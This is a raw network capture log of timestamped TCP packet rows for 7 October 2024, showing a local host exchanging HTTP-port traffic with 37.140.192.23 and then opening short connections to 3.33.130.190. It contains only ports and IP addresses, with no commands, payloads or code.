Oct 7, 2024 11:54:34.829668045 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:34.829792023 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:34.829998016 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:34.830007076 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:34.830007076 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:34.830126047 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:34.830360889 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:34.830482006 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:34.830779076 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:34.830900908 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:34.830997944 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:34.830997944 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:34.831047058 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:34.831110954 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:34.831222057 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:34.831365108 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:34.831643105 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:34.831753016 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:34.831902981 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:34.832000017 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:34.832030058 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:34.832416058 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:34.832426071 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:34.832572937 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:34.832689047 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:34.832794905 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:34.832995892 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:34.833045006 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:34.833115101 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:34.833240032 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:34.833430052 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:34.833452940 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:34.833506107 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:34.833758116 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:34.833870888 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:34.834085941 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:34.834085941 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:35.036956072 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.036999941 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.037234068 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:35.037266970 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.037327051 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.037738085 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.037864923 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.038052082 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:35.038052082 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:35.038083076 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.038228989 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.038403988 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:35.038522959 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.038603067 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.038856030 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.038942099 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:35.038985968 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.039171934 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.039197922 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:35.039309025 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.039493084 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:35.039529085 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.039649963 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.039952993 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.039983034 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:35.040179968 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.040273905 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.040396929 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.040546894 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:35.040546894 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:35.040661097 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.040769100 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.041088104 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.041110039 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:35.041219950 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.041368961 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:35.041409969 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.041536093 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.042066097 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:35.042279005 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.042397022 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.042521954 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.042577982 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.042999029 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.043040991 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:35.043040991 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:35.043057919 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.043112993 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.043126106 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.043488026 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:35.043494940 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.043616056 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.043864012 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.043919086 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.044179916 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:35.044226885 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:35.044388056 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.044507980 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.044909000 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.044960976 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.045213938 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:35.045262098 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:35.045490026 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.045764923 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.046231031 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.046281099 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:35.046319962 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.046375036 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.046387911 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.046542883 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:35.046693087 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.046714067 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:35.046756029 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.046925068 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.047046900 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.047372103 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:35.047411919 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.047420025 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:35.047540903 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.047746897 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:35.048033953 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.048146009 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.048202038 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.048345089 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:35.048626900 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.048676968 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.048779011 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:35.048791885 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.048912048 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.049216032 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.049336910 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.049374104 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:35.049453974 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:35.049663067 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.049783945 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.049926043 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.050050020 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.050265074 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.050362110 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:35.050390959 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.050410986 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:35.050458908 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:35.050637960 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.050762892 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.050796032 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:35.051028967 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.051152945 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.051393032 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:35.051414967 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.051537037 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.051563978 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:35.051748991 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.051882982 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.052155972 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.052253008 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:35.052289963 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.052448034 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:35.098862886 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:35.247852087 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.247982025 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.248150110 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:35.248368025 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.248481989 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.248640060 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:35.248821020 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.248970032 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.249109983 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:35.249125957 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.249226093 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.249372005 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:35.249758005 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.249823093 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.249983072 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:35.250107050 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.250197887 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.250515938 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:35.250773907 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.250989914 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.251122952 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:35.251230955 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.251354933 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.251480103 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.251530886 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:35.251534939 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.251750946 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:35.251888037 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.252012014 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.252193928 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:35.252310038 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.252383947 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.252554893 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.252588987 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:35.252700090 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.252851963 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:35.253012896 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.253137112 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.253336906 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:35.253498077 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.253619909 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.253766060 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:35.254343987 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.254453897 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.254715919 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:35.254724979 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.254848003 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.255124092 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.255168915 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:35.255280972 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.255455971 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:35.255567074 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.255686045 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.255829096 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:35.255943060 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.255956888 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.256131887 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:35.256282091 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.256395102 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.256575108 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:35.256738901 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.256848097 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.257067919 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:35.257257938 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.257400990 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.257522106 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.257534981 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:35.257576942 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.257756948 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:35.257868052 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.257993937 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.258160114 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:35.258363962 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.258487940 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.258649111 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.258692980 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:35.258970976 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.259021997 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.259130955 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:35.259149075 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.259330034 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:35.259499073 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.259607077 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.259759903 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:35.260009050 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.260104895 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.260293961 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:35.260509014 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.260622025 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.260878086 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:35.261087894 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.261164904 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.261291027 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.261333942 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:35.261348963 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.261543989 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.261591911 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:35.261598110 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.261748075 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:35.261892080 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.262016058 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.262217045 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:35.262253046 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.262367964 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.262634993 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.262645960 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:35.262753010 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.262886047 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.262923002 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:35.262945890 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.263047934 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.263061047 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.263133049 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.263153076 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:35.263195992 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.263209105 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.263219118 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:35.263293982 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.263384104 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.263437986 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.263451099 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:35.263529062 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:35.263577938 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:35.263638020 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.263760090 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.263945103 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:35.264058113 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.264138937 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.264297009 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:35.264408112 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.264481068 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.264647007 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:35.264755964 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.264832973 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.265058994 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:35.265183926 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.265321970 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.265477896 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.265536070 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:35.265645981 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.265844107 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:35.267069101 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:35.267364025 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:35.270418882 CEST	49817	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:35.481556892 CEST	80	49817	37.140.192.23	192.168.11.30
Oct 7, 2024 11:54:40.460632086 CEST	49818	80	192.168.11.30	3.33.130.190
Oct 7, 2024 11:54:40.559817076 CEST	80	49818	3.33.130.190	192.168.11.30
Oct 7, 2024 11:54:40.560087919 CEST	49818	80	192.168.11.30	3.33.130.190
Oct 7, 2024 11:54:40.570455074 CEST	49818	80	192.168.11.30	3.33.130.190
Oct 7, 2024 11:54:40.669646025 CEST	80	49818	3.33.130.190	192.168.11.30
Oct 7, 2024 11:54:40.671677113 CEST	80	49818	3.33.130.190	192.168.11.30
Oct 7, 2024 11:54:40.671827078 CEST	49818	80	192.168.11.30	3.33.130.190
Oct 7, 2024 11:54:42.081680059 CEST	49818	80	192.168.11.30	3.33.130.190
Oct 7, 2024 11:54:42.180818081 CEST	80	49818	3.33.130.190	192.168.11.30
Oct 7, 2024 11:54:43.100354910 CEST	49819	80	192.168.11.30	3.33.130.190
Oct 7, 2024 11:54:43.200253010 CEST	80	49819	3.33.130.190	192.168.11.30
Oct 7, 2024 11:54:43.200416088 CEST	49819	80	192.168.11.30	3.33.130.190
Oct 7, 2024 11:54:43.209887981 CEST	49819	80	192.168.11.30	3.33.130.190
Oct 7, 2024 11:54:43.309525013 CEST	80	49819	3.33.130.190	192.168.11.30
Oct 7, 2024 11:54:43.311955929 CEST	80	49819	3.33.130.190	192.168.11.30
Oct 7, 2024 11:54:43.312133074 CEST	49819	80	192.168.11.30	3.33.130.190
Oct 7, 2024 11:54:44.721720934 CEST	49819	80	192.168.11.30	3.33.130.190
Oct 7, 2024 11:54:44.821458101 CEST	80	49819	3.33.130.190	192.168.11.30
Oct 7, 2024 11:54:45.740693092 CEST	49820	80	192.168.11.30	3.33.130.190
Oct 7, 2024 11:54:45.839932919 CEST	80	49820	3.33.130.190	192.168.11.30
Oct 7, 2024 11:54:45.840198040 CEST	49820	80	192.168.11.30	3.33.130.190
Oct 7, 2024 11:54:45.850275993 CEST	49820	80	192.168.11.30	3.33.130.190
Oct 7, 2024 11:54:45.850332975 CEST	49820	80	192.168.11.30	3.33.130.190
Oct 7, 2024 11:54:45.949635029 CEST	80	49820	3.33.130.190	192.168.11.30
Oct 7, 2024 11:54:45.949795008 CEST	80	49820	3.33.130.190	192.168.11.30
Oct 7, 2024 11:54:45.949857950 CEST	80	49820	3.33.130.190	192.168.11.30
Oct 7, 2024 11:54:46.864233971 CEST	80	49820	3.33.130.190	192.168.11.30
Oct 7, 2024 11:54:46.864377022 CEST	49820	80	192.168.11.30	3.33.130.190
Oct 7, 2024 11:54:47.361764908 CEST	49820	80	192.168.11.30	3.33.130.190
Oct 7, 2024 11:54:47.461034060 CEST	80	49820	3.33.130.190	192.168.11.30
Oct 7, 2024 11:54:48.380646944 CEST	49821	80	192.168.11.30	3.33.130.190
Oct 7, 2024 11:54:48.480745077 CEST	80	49821	3.33.130.190	192.168.11.30
Oct 7, 2024 11:54:48.480942965 CEST	49821	80	192.168.11.30	3.33.130.190
